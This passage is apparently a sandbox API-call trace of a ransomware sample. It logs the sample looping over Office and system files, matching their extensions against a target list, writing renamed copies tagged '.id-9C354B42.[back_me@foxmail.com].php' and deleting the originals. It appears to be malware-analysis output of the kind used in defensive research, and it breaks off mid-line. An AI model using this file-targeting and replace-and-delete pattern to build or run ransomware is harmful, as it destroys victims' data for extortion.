lstrlenW (lpString=".ppt") returned 4 [0037.888] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.888] lstrlenW (lpString=".zip") returned 4 [0037.888] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.888] lstrlenW (lpString=".rar") returned 4 [0037.888] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString=".bz2") returned 4 [0037.888] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString=".7z") returned 3 [0037.888] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.888] lstrlenW (lpString=".dbf") returned 4 [0037.888] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.888] lstrlenW (lpString=".1cd") returned 4 [0037.888] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.888] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.888] lstrlenW (lpString=".jpg") returned 4 [0037.888] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.889] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0037.889] lstrlenW (lpString="VisiorWW.xml") returned 12 [0037.889] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.975] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=8723) returned 1 [0037.975] CloseHandle (hObject=0x1bc) returned 1 [0037.975] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 0x2020 [0037.975] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.975] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.975] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.975] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.975] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0037.976] GetLastError () returned 0x0 [0037.976] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x2213, lpOverlapped=0x0) returned 1 [0038.019] WriteFile (in: hFile=0x1f0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x2220, lpOverlapped=0x0) returned 1 [0038.020] ReadFile (in: hFile=0x1bc, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0038.021] WriteFile (in: hFile=0x1f0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0038.021] SetEndOfFile (hFile=0x1f0) returned 1 [0038.021] CloseHandle (hObject=0x1f0) returned 1 [0038.021] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0038.021] SetEndOfFile (hFile=0x1bc) returned 1 [0038.022] CloseHandle (hObject=0x1bc) returned 1 [0038.022] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0038.023] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml")) returned 1 [0038.023] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.023] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.023] lstrlenW (lpString=".doc") returned 4 [0038.023] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.023] lstrlenW (lpString=".docx") returned 5 [0038.023] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0038.023] lstrlenW (lpString=".pdf") returned 4 [0038.023] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.023] lstrlenW (lpString=".xls") returned 4 [0038.023] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.023] lstrlenW (lpString=".xlsx") returned 5 [0038.023] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0038.023] lstrlenW (lpString=".ppt") returned 4 [0038.023] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.023] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.023] lstrlenW (lpString=".zip") returned 4 [0038.023] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.023] lstrlenW (lpString=".rar") returned 4 [0038.023] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.023] lstrlenW (lpString=".bz2") returned 4 [0038.023] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.023] lstrlenW (lpString=".7z") returned 3 [0038.023] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.024] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.024] lstrlenW (lpString=".dbf") returned 4 [0038.024] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.024] lstrlenW (lpString=".1cd") returned 4 [0038.024] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.024] lstrlenW (lpString=".jpg") returned 4 [0038.024] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.024] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.024] lstrlenW (lpString=".doc") returned 4 [0038.024] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString=".docx") returned 5 [0038.024] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0038.024] lstrlenW (lpString=".pdf") returned 4 [0038.024] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString=".xls") returned 4 [0038.024] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString=".xlsx") returned 5 [0038.024] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0038.024] lstrlenW (lpString=".ppt") returned 4 [0038.024] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.024] lstrlenW (lpString=".zip") returned 4 [0038.024] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0038.024] lstrlenW (lpString=".rar") returned 4 [0038.024] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString=".bz2") returned 4 [0038.024] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0038.024] lstrlenW (lpString=".7z") returned 3 [0038.025] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0038.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.025] lstrlenW (lpString=".dbf") returned 4 [0038.025] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0038.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.025] lstrlenW (lpString=".1cd") returned 4 [0038.025] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0038.025] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 75 [0038.025] lstrlenW (lpString=".jpg") returned 4 [0038.025] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0038.025] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0038.025] lstrlenW (lpString="boxed-delete.avi") returned 16 [0038.025] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.207] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=31744) returned 1 [0039.207] CloseHandle (hObject=0x1e4) returned 1 [0039.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi")) returned 0x20 [0039.207] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.207] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.207] lstrlenW (lpString=".doc") returned 4 [0039.207] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.207] lstrlenW (lpString=".docx") returned 5 [0039.207] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0039.207] lstrlenW (lpString=".pdf") returned 4 [0039.207] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.207] lstrlenW (lpString=".xls") returned 4 [0039.207] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.207] lstrlenW (lpString=".xlsx") returned 5 [0039.207] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0039.207] lstrlenW (lpString=".ppt") returned 4 [0039.207] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.207] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.207] lstrlenW (lpString=".zip") returned 4 [0039.208] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString=".rar") returned 4 [0039.208] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString=".bz2") returned 4 [0039.208] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString=".7z") returned 3 [0039.208] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.208] lstrlenW (lpString=".dbf") returned 4 [0039.208] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.208] lstrlenW (lpString=".1cd") returned 4 [0039.208] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.208] lstrlenW (lpString=".jpg") returned 4 [0039.208] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.208] lstrlenW (lpString=".doc") returned 4 [0039.208] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString=".docx") returned 5 [0039.208] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0039.208] lstrlenW (lpString=".pdf") returned 4 [0039.208] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString=".xls") returned 4 [0039.208] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString=".xlsx") returned 5 [0039.208] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0039.208] lstrlenW (lpString=".ppt") returned 4 [0039.208] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.208] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.208] lstrlenW (lpString=".zip") returned 4 [0039.209] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.209] lstrlenW (lpString=".rar") returned 4 [0039.209] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.209] lstrlenW (lpString=".bz2") returned 4 [0039.209] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.209] lstrlenW (lpString=".7z") returned 3 [0039.209] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.209] lstrlenW (lpString=".dbf") returned 4 [0039.209] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.209] lstrlenW (lpString=".1cd") returned 4 [0039.209] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.209] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-delete.avi") returned 73 [0039.209] lstrlenW (lpString=".jpg") returned 4 [0039.209] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.209] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0039.209] lstrlenW (lpString="correct.avi") returned 11 [0039.209] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.209] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=197120) returned 1 [0039.209] CloseHandle (hObject=0x1e4) returned 1 [0039.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0039.210] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.210] lstrlenW (lpString=".doc") returned 4 [0039.210] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.210] lstrlenW (lpString=".docx") returned 5 [0039.210] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.210] lstrlenW (lpString=".pdf") returned 4 [0039.210] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.210] lstrlenW (lpString=".xls") returned 4 [0039.210] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.210] lstrlenW (lpString=".xlsx") returned 5 [0039.210] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.210] lstrlenW (lpString=".ppt") returned 4 [0039.210] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.210] lstrlenW (lpString=".zip") returned 4 [0039.210] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.210] lstrlenW (lpString=".rar") returned 4 [0039.210] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.210] lstrlenW (lpString=".bz2") returned 4 [0039.210] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.210] lstrlenW (lpString=".7z") returned 3 [0039.210] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.210] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.211] lstrlenW (lpString=".dbf") returned 4 [0039.211] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.211] lstrlenW (lpString=".1cd") returned 4 [0039.211] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.211] lstrlenW (lpString=".jpg") returned 4 [0039.211] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.211] lstrlenW (lpString=".doc") returned 4 [0039.211] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString=".docx") returned 5 [0039.211] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0039.211] lstrlenW (lpString=".pdf") returned 4 [0039.211] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString=".xls") returned 4 [0039.211] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString=".xlsx") returned 5 [0039.211] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0039.211] lstrlenW (lpString=".ppt") returned 4 [0039.211] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.211] lstrlenW (lpString=".zip") returned 4 [0039.211] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString=".rar") returned 4 [0039.211] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString=".bz2") returned 4 [0039.211] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.211] lstrlenW (lpString=".7z") returned 3 [0039.211] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.212] lstrlenW (lpString=".dbf") returned 4 [0039.212] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.212] lstrlenW (lpString=".1cd") returned 4 [0039.212] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.212] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0039.212] lstrlenW (lpString=".jpg") returned 4 [0039.212] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.212] lstrcmpiW (lpString1=".avi", lpString2=".php") returned -1 [0039.212] lstrlenW (lpString="delete.avi") returned 10 [0039.212] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0039.253] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=224256) returned 1 [0039.254] CloseHandle (hObject=0x1e4) returned 1 [0039.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0039.254] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.254] lstrlenW (lpString=".doc") returned 4 [0039.254] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.254] lstrlenW (lpString=".docx") returned 5 [0039.254] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0039.254] lstrlenW (lpString=".pdf") returned 4 [0039.254] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.254] lstrlenW (lpString=".xls") returned 4 [0039.254] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.254] lstrlenW (lpString=".xlsx") returned 5 [0039.254] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0039.254] lstrlenW (lpString=".ppt") returned 4 [0039.254] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0039.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.254] lstrlenW (lpString=".zip") returned 4 [0039.254] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0039.254] lstrlenW (lpString=".rar") returned 4 [0039.254] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0039.254] lstrlenW (lpString=".bz2") returned 4 [0039.254] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0039.254] lstrlenW (lpString=".7z") returned 3 [0039.255] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0039.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.255] lstrlenW (lpString=".dbf") returned 4 [0039.255] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.255] lstrlenW (lpString=".1cd") returned 4 [0039.255] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0039.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.255] lstrlenW (lpString=".jpg") returned 4 [0039.255] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0039.255] lstrlenW (lpString=".doc") returned 4 [0039.255] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString=".docx") returned 5 [0039.255] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0039.255] lstrlenW (lpString=".pdf") returned 4 [0039.255] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString=".xls") returned 4 [0039.255] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0039.255] lstrlenW (lpString=".xlsx") returned 5 [0039.255] lstrcmpiW 